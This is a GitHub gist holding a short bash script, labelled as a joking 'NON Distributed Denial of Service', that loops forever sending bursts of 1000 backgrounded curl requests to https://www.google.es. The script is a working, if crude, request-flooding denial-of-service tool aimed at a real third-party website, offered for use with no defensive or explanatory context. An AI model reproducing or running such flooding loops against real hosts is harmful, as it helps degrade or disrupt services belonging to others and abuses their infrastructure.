Skip to content

Instantly share code, notes, and snippets.

@mercuriete
Created April 9, 2021 11:41
Show Gist options
  • Save mercuriete/8927e51bc4e78fd0f330a1df7c471752 to your computer and use it in GitHub Desktop.
Save mercuriete/8927e51bc4e78fd0f330a1df7c471752 to your computer and use it in GitHub Desktop.
#!/bin/bash
# NON Distributed Denial of Service xD LOL
while true; do
for i in {1..1000}
do
curl -X GET "https://www.google.es" &
#echo "$i"
done
curl -X GET "https://www.google.es"
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment